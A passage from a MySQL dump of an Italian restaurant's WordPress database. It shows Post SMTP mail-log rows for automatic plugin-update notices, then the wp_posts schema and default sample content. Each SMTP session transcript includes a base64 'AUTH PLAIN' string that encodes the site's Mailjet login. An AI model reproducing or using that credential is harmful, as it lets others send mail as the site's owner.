2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <dd26792155391aeac68261aec0cf4308@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Mon, 15 Mar 2021 01:27:50 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- WP Fastest Cache (da version=\r\ne 0.9.1.5 a 0.9.1.6)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bis=\r\nogno di aiuto, i volontari dei forum di supporto su https://it.wordpress=\r\n..org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/su=\r\npport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 0e35736f-d05e-4378-8d4b-78c2498c0c55\r\n'),(58767,4639,'solution','All good, mail sent.'),(58768,4639,'success','1'),(58769,4639,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58770,4639,'to_header','webmaster@baldisserri.com'),(58771,4639,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58772,4639,'original_to','webmaster@baldisserri.com'),(58773,4639,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58774,4639,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.6 a 3.1.7)\n- Yoast SEO (da versione 15.9.2 a 16.0)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58775,4639,'original_headers',''),(58776,4639,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <eff25f2d38b9ae16883820c9714e5a53@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 16 Mar 2021 12:27:16 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Newsletter, SMTP, Email mark=\r\neting and Subscribe forms by Sendinblue (da versione 3.1.6 a 3.1.7)=0A-=\r\n Yoast SEO (da versione 15.9.2 a 16.0)=0A=0A=0ASe hai problemi di qualsi=\r\nasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su ht=\r\ntps://it.wordpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://i=\r\nt.wordpress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 56e54903-95b7-4161-b02b-f5c99d1a69bd\r\n'),(58777,4640,'solution','All good, mail sent.'),(58778,4640,'success','1'),(58779,4640,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58780,4640,'to_header','webmaster@baldisserri.com'),(58781,4640,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58782,4640,'original_to','webmaster@baldisserri.com'),(58783,4640,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58784,4640,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.49 a 1.16.50)\n- Yoast SEO (da versione 16.0 a 16.0.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58785,4640,'original_headers',''),(58786,4640,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <bb1aa4053bb7cca40db0c61e80082a27@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 17 Mar 2021 00:34:32 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- UpdraftPlus - Backup/Riprist=\r\nino (da versione 1.16.49 a 1.16.50)=0A- Yoast SEO (da versione 16.0 a 16=\r\n..0.1)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di aiuto,=\r\n i volontari dei forum di supporto su https://it.wordpress.org/forums/ p=\r\nossono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/forums/=\r\n=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 50e1168b-9c2a-406f-8430-76893c161976\r\n'),(58787,4641,'solution','All good, mail sent.'),(58788,4641,'success','1'),(58789,4641,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58790,4641,'to_header','webmaster@baldisserri.com'),(58791,4641,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58792,4641,'original_to','webmaster@baldisserri.com'),(58793,4641,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58794,4641,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Direct Checkout for WooCommerce (da versione 2.4.3 a 2.4.5)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58795,4641,'original_headers',''),(58796,4641,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <79c8a419ad8a78ac58d6436abc166c9c@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 17 Mar 2021 12:44:26 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Direct Checkout for WooComme=\r\nrce (da versione 2.4.3 a 2.4.5)=0A=0A=0ASe hai problemi di qualsiasi tip=\r\no o hai bisogno di aiuto, i volontari dei forum di supporto su https://i=\r\nt.wordpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordp=\r\nress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 19f579ec-2aaa-4995-99b1-7d0cacf0a4ec\r\n'),(58797,4642,'solution','All good, mail sent.'),(58798,4642,'success','1'),(58799,4642,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58800,4642,'to_header','webmaster@baldisserri.com'),(58801,4642,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58802,4642,'original_to','webmaster@baldisserri.com'),(58803,4642,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58804,4642,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Sydney Toolbox (da versione 1.14 a 1.15)\n- Yoast SEO (da versione 16.0.1 a 16.0.2)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58805,4642,'original_headers',''),(58806,4642,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <4aa393fa041810bb22012891daee8585@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 18 Mar 2021 13:23:16 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Sydney Toolbox (da versione=\r\n 1.14 a 1.15)=0A- Yoast SEO (da versione 16.0.1 a 16.0.2)=0A=0A=0ASe hai=\r\n problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei foru=\r\nm di supporto su https://it.wordpress.org/forums/ possono riuscire ad ai=\r\nutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di WordP=\r\nress\r\n.\r\n250 OK queued as a853a221-8eea-49de-aca9-9ff6852c772d\r\n'),(58807,4643,'solution','All good, mail sent.'),(58808,4643,'success','1'),(58809,4643,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58810,4643,'to_header','webmaster@baldisserri.com'),(58811,4643,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58812,4643,'original_to','webmaster@baldisserri.com'),(58813,4643,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58814,4643,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Smash Balloon Instagram Feed (da versione 2.8.2 a 2.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58815,4643,'original_headers',''),(58816,4643,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <20ff0f41ec7f4d9d552c00704684be10@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Sat, 20 Mar 2021 00:32:04 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Smash Balloon Instagram Feed=\r\n (da versione 2.8.2 a 2.9)=0A=0A=0ASe hai problemi di qualsiasi tipo o h=\r\nai bisogno di aiuto, i volontari dei forum di supporto su https://it.wor=\r\ndpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.=\r\norg/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as e48cc291-89f0-459d-ba53-8a69f86dd4dc\r\n'),(58817,4644,'solution','All good, mail sent.'),(58818,4644,'success','1'),(58819,4644,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58820,4644,'to_header','webmaster@baldisserri.com'),(58821,4644,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58822,4644,'original_to','webmaster@baldisserri.com'),(58823,4644,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58824,4644,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.4.1 a 2.4.2)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58825,4644,'original_headers',''),(58826,4644,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <de83d9882c106acc20ed489f9ee0a266@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Mon, 22 Mar 2021 12:44:16 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Cookie and Consent Solution=\r\n for the GDPR &amp; ePrivacy (da versione 2.4.1 a 2.4.2)=0A=0A=0ASe hai=\r\n problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei foru=\r\nm di supporto su https://it.wordpress.org/forums/ possono riuscire ad ai=\r\nutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di WordP=\r\nress\r\n.\r\n250 OK queued as a5944b59-1f02-4806-9825-8c7a2f06db25\r\n');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=4661 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (2,1,'2018-07-25 08:07:57','2018-07-25 08:07:57','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href=\"http://attika.mikado-themes.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','Sample Page','','publish','closed','open','','sample-page','','','2018-07-25 08:07:57','2018-07-25 08:07:57','',0,'http://attika.mikado-themes.com/?page_id=2',0,'page','',0),(3,1,'2018-07-25 08:07:57','2018-07-25 08:07:57','<h2>Who we are</h2><p>Our website address is: http://attika.mikado-themes.com.</p><h2>What personal data we collect and why we collect it</h2><h3>Comments</h3><p>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor&#8217;s IP address and browser user agent string to help spam detection.</p><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><h3>Media</h3><p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><h3>Contact forms</h3><h3>Cookies</h3><p>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><p>If you have an account and you log in to this site, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select &quot;Remember Me&quot;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><h3>Embedded content from other websites</h3><p>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><h3>Analytics</h3><h2>Who we share your data with</h2><h2>How long we retain your data</h2><p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><p>For users that register on our website (if 